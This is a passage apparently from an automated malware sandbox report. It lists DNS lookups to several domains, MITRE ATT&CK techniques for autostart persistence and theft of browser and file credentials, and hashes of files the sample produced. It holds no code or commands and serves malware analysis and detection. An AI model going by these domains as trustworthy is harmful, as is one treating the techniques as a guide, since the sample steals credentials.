r10.o.lencr.org
DNS Response
88.221.135.105, 88.221.134.89
-
73 B 139 B 1 1
DNS Request
168.245.100.95.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
105.135.221.88.in-addr.arpa
-
61 B 134 B 1 1
DNS Request
imagescroll.com
-
64 B 145 B 1 1
DNS Request
music.mbsaeger.com
-
55 B 71 B 1 1
DNS Request
stacon.eu
DNS Response
85.128.128.104
-
70 B 194 B 1 1
DNS Request
surrogacyandadoption.com
DNS Response
54.85.129.208, 34.193.158.132
-
67 B 99 B 1 1
DNS Request
worldisonefamily.info
DNS Response
104.155.138.21, 107.178.223.183
-
73 B 113 B 1 1
DNS Request
104.128.128.85.in-addr.arpa
-
72 B 127 B 1 1
DNS Request
208.129.85.54.in-addr.arpa
-
73 B 126 B 1 1
DNS Request
21.138.155.104.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
60.153.16.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
14.160.190.20.in-addr.arpa
-
61 B 134 B 1 1
DNS Request
imagescroll.com
-
64 B 145 B 1 1
DNS Request
music.mbsaeger.com
-
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
Credential Access
- Credentials from Password Stores (1): Credentials from Web Browsers (1)
- Unsecured Credentials (1): Credentials In Files (1)
Downloads
-
Filesize 9KB
MD5 1b78b85e42aed2f4e8159decab1ec819
SHA1 479f4d30be894ba9495d270094290f7bcff94f84
SHA256 b1bdc33175adff6089400d64922e47808f9b59181a6fe69504a48e9e71ab83ef
SHA512 c3f30a3e21d0c7cccf8e123774caef96b2328eda6e99bb37c84f8a9652ecc20ab96124f69b214dd29c9801a0c2ca3cb53662f2f93d68fa102a45a5b927f9c7d8
-
Filesize 63KB
MD5 14b1317ab0dc245f3d4442c108ddaaf1
SHA1 07a562b5b2db6be1d282e17c7b3d5d1077542572
SHA256 f0eb1c3c0f67119764d8fa98a355b934ef015e78e075bc56975a5d72be2faa60
SHA512 24ef58d032cb9ad974eaab240554ce815cd27b59f07ee6d4a6fbdce6b2fff4d87fa7c74b686a0bfe999a675a1974b988af01fa3450460427fda915f43031b67b
-
Filesize 1KB
MD5 bfc580ab1e9f663c55ce4c0d6ac785fc
SHA1 559d268a13a5b6b1f484323685fac4e58d8b5a65
SHA256 f05afa6bd494fe218279450670b5007cefa3d4a3ce34818d9551f6e80f8c9efb
SHA512 d2c18e8e8a9a649352e87edb23edede5ea9c2bea03acad3cc8e88dd23d6b9ebdf912a6f19ddf86dcf9702250aab6288d7fdb325cd619553f8a297aa23034a086
-
Filesize 560B
MD5 dfea4a0ebadf07521723b12dbe809df7
SHA1 68b95f34bc8666bca44c695ce596625b82b0e05e
SHA256 9d4fbf692ebc6f8f204e0f3ea4943cde541c012e9308adf7db29202912394e8e
SHA512 1441c86b03e1ffbf19ada0b5f961a2df814f75c11589a82066cd03878b5a6f4015f07c7c6aeafcf0720aba0e4dee9dc13c8b38d453914b9c37eaacd6488bd4f1
-
Filesize 560B
MD5 5c00129a490f1c59b3aa9d45674fa9d6
SHA1 b74981401059188e80a62c59ab9ad2fcad912aff
SHA256 e7eead0d6a49c89331d20302cb5e13fd6975f95c8dc489590101bd13bb8ba1bc
SHA512 4e5f5177520a9d1e6b3c8dda960c9d0f6b706d99a35cc27296d232a7675d81fd9387f1f10ced245e7b4e4cf1ae679d3fb24086a0f2da3638e64afd7a0325d9b3
-
Filesize 416B
MD5 611993ae6f2843abe00011331578c44a
SHA1 8c211e333b508badb8f2ca4845adae2af25f5bca
SHA256 792e259bb12f658e3d041659de1112df4fece3a535235b6d475973096905e2be
SHA512 f739552c80b4bdbb8ece99917657d00c26ed880904aaec2c9a852aec952e4ac59de62076bc60e97986e1ca69aa298c815a68794e152b4e6eec901ce838104fb0
-
Filesize 152B
MD5 d22073dea53e79d9b824f27ac5e9813e
SHA1 6d8a7281241248431a1571e6ddc55798b01fa961
SHA256 86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
SHA512 97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413
-
Filesize 152B
MD5 bffcefacce25cd03f3d5c9446ddb903d
SHA1 8923f84aa86db316d2f5c122fe3874bbe26f3bab
SHA256 23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
SHA512 761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7
-
Filesize 5KB
MD5 e8adf384a640023017e67ce46b96cf5e
SHA1 9be592237283c3f115d8482a83bcdc22e33a6b85
SHA256 e309d7d151000a1c0659050408809186159f6055d72363d18b23a270aa36ca36
SHA512 e18d234c8346c0d9b319c1a07be528e168b46b27b913ae40eea0b7c4b371f973cde5dbc09814786b99eef06c07840441227ae2dd49dc566bd3877c3cf7fc0ac0
-
Filesize 16B
MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727662192103813.txt
Filesize 77KB
MD5 0089a10fcb5c08347469b9ff8736d05b
SHA1 969d1e17cd9812c0bb6063f584d61ca4a0567126
SHA256 236b55b1d09b2bfe5d42685ba0b6c307fe07edb13a28c5f06184221245a2b7aa
SHA512 07314b52068012e8e5bb52a7ca8c3c7158259b85f4fc6fe689fe850f0258ecdfac398befcd81e90a2d97d952e859452680bc3a7ab6a99e556f55d6d4e24cdb7c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727663401899668.txt
Filesize 47KB
MD5 a8ebbc8426d2a55cb7e6ba84d986bd7d
SHA1 336fd816759f420b530b60aa9f85fa97f894c4f9
SHA256 bbf141633400dc69c1314839522cc9fbbfefa235cf6e7ab33d7ab23c9964ad15
SHA512 3235f5bc5c7469ec83f47b2d0cd1a0a8e4fd418f1059862b5d74b1f649ee314f3f32a526a50cf02c0f1984eaf34b533b4e2e2bc23146d8b5d8c1908b86b9c0a8
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727670771168387.txt
Filesize 74KB
MD5 ca7ac5999ce50bb1bcbed911ef3351ed
SHA1 f3ba96187e6669e8e83d7fb5d501492c7e43dbbb
SHA256 58d9231755940e78c409c53c46a3ae92409478bb8d4a2458129f1bbf3d8354b0
SHA512 52bcdfccf3040e8723ae5288d11962a25ba5722ccbc8530f9917d3468f50d55674b3bc03d3dee0daf761e1a19da175c1c7869b59ac263776b4cdf4cf6ec6bd45
-
Filesize 371KB
MD5 c192a273a786b569df2056914faf8327
SHA1 87f24f470d678deae2cade1d3fd12255e796c091
SHA256 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced
SHA512 8e036f23c66fbd545fd03aba423a47bf422cee52204fc3a2fb2682fd00a31c2f3e6dc982d01fa30ab2f8ba0b3463a763e403b212f00fe9488b2791dd03629427